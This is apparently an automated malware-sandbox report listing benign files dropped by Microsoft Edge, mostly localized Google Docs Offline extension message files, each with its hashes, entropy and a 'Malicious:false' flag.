              Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1337
              Entropy (8bit):4.69531415794894
              Encrypted:false
              SSDEEP:
              MD5:51D34FE303D0C90EE409A2397FCA437D
              SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
              SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
              SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2846
              Entropy (8bit):3.7416822879702547
              Encrypted:false
              SSDEEP:
              MD5:B8A4FD612534A171A9A03C1984BB4BDD
              SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
              SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
              SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
              Malicious:false
              Reputation:unknown
              Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):934
              Entropy (8bit):4.882122893545996
              Encrypted:false
              SSDEEP:
              MD5:8E55817BF7A87052F11FE554A61C52D5
              SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
              SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
              SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):963
              Entropy (8bit):4.6041913416245
              Encrypted:false
              SSDEEP:
              MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
              SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
              SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
              SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1320
              Entropy (8bit):4.569671329405572
              Encrypted:false
              SSDEEP:
              MD5:7F5F8933D2D078618496C67526A2B066
              SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
              SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
              SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):884
              Entropy (8bit):4.627108704340797
              Encrypted:false
              SSDEEP:
              MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
              SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
              SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
              SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):980
              Entropy (8bit):4.50673686618174
              Encrypted:false
              SSDEEP:
              MD5:D0579209686889E079D87C23817EDDD5
              SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
              SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
              SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1941
              Entropy (8bit):4.132139619026436
              Encrypted:false
              SSDEEP:
              MD5:DCC0D1725AEAEAAF1690EF8053529601
              SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
              SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
              SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1969
              Entropy (8bit):4.327258153043599
              Encrypted:false
              SSDEEP:
              MD5:385E65EF723F1C4018EEE6E4E56BC03F
              SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
              SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
              SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1674
              Entropy (8bit):4.343724179386811
              Encrypted:false
              SSDEEP:
              MD5:64077E3D186E585A8BEA86FF415AA19D
              SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
              SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
              SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1063
              Entropy (8bit):4.853399816115876
              Encrypted:false
              SSDEEP:
              MD5:76B59AAACC7B469792694CF3855D3F4C
              SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
              SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
              SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1333
              Entropy (8bit):4.686760246306605
              Encrypted:false
              SSDEEP:
              MD5:970963C25C2CEF16BB6F60952E103105
              SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
              SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
              SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1263
              Entropy (8bit):4.861856182762435
              Encrypted:false
              SSDEEP:
              MD5:8B4DF6A9281333341C939C244DDB7648
              SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
              SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
              SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1074
              Entropy (8bit):5.062722522759407
              Encrypted:false
              SSDEEP:
              MD5:773A3B9E708D052D6CBAA6D55C8A5438
              SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
              SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
              SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):879
              Entropy (8bit):5.7905809868505544
              Encrypted:false
              SSDEEP:
              MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
              SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
              SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
              SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1205
              Entropy (8bit):4.50367724745418
              Encrypted:false
              SSDEEP:
              MD5:524E1B2A370D0E71342D05DDE3D3E774
              SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
              SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
              SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
              Malicious:false
              Reputation:unknown
              Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):843
              Entropy (8bit):5.76581227215314
              Encrypted:false
              SSDEEP:
              MD5:0E60627ACFD18F44D4DF469D8DCE6D30
              SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
              SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
              SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
              Malicious:false
              Reputation:unknown
              Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):912
              Entropy (8bit):4.65963951143349
              Encrypted:false
              SSDEEP:
              MD5:71F916A64F98B6D1B5D1F62D297FDEC1
              SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
              SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
              SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
              Malicious:false
              Reputation:unknown
              Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):18518
              Entropy (8bit):5.709939179890619
              Encrypted:false
              SSDEEP:
              MD5:05BEDDE10A35815204BEB8BADD3DB9B4
              SHA1:000E7E6984EDEF11E937929DB047FF6FCB87CB1E
              SHA-256:65A138E44834C8EE9D2946960C97D6FF3978874F4641A16568322B9318976151
              SHA-512:9F42514DBA8F11ED41041C68960B7538BADFC0CEC6AF01F885AB7197DA27CAE0EC0DE78E49D585612AC4B5C025C070EF4F03ED39E894D9699FFE887272487D07
              Malicious:false
              Reputation:unknown
              Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsiY2Fub25pY2FsX2pzb25fcm9vdF9oYXNoIjoiOE1xa2JXMkFQWkVpbzlQTHlYNVItT3o1bGs5a29sbnlWTWtvYlVabk15YyIsInBhdGgiOiJfbG9jYWxlcy9hZi9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoicWhJZ1d4Q0hVTS1mb0plRVlhYllpQjVPZ05vZ3FFYllKTnBBYWRuSkdFYyJ9LHsiY2Fub25pY2FsX2pzb25fcm9vdF9oYXNoIjoiV0E0cW96b3R5ZzJrcUpKU0FEYWNVMGNDbEdJYjlmMmp1ejhYalh0YUhybyIsInBhdGgiOiJfbG9jYWxlcy9hbS9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiWk9BYndwSzZMcUZwbFhiOHhFVTJjRWRTRHVpVjRwRE03aURDVEpNMjJPOCJ9LHsiY2Fub25pY2FsX2pzb25fcm9vdF9oYXNoIjoiQlk4QVRlUUktWHNqLWFSbVZfTi03dHVzUlJyQUNkU25yU3NhT2d3R3pTWSIsInBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsiY2Fub25pY2FsX2pzb25fcm9vdF9oYXNoIjoiX0pLU3pRcGk4TVczZE5WZldwN281STVjX09
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):854
              Entropy (8bit):4.284628987131403
              Encrypted:false
              SSDEEP:
              MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
              SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
              SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
              SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
              Malicious:false
              Reputation:unknown
              Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              File Type:ASCII text, with very long lines (3422)
              Category:dropped
              Size (bytes):82471
              Entropy (8bit):5.379624543852408
              Encrypted:false
              SSDEEP:
              MD5:A7D0D56DF8E576C9CDE7DB6C11045CD7
              SHA1:EAFE0A7FE5217B254FCE57223A5C8F4A30B1B56A
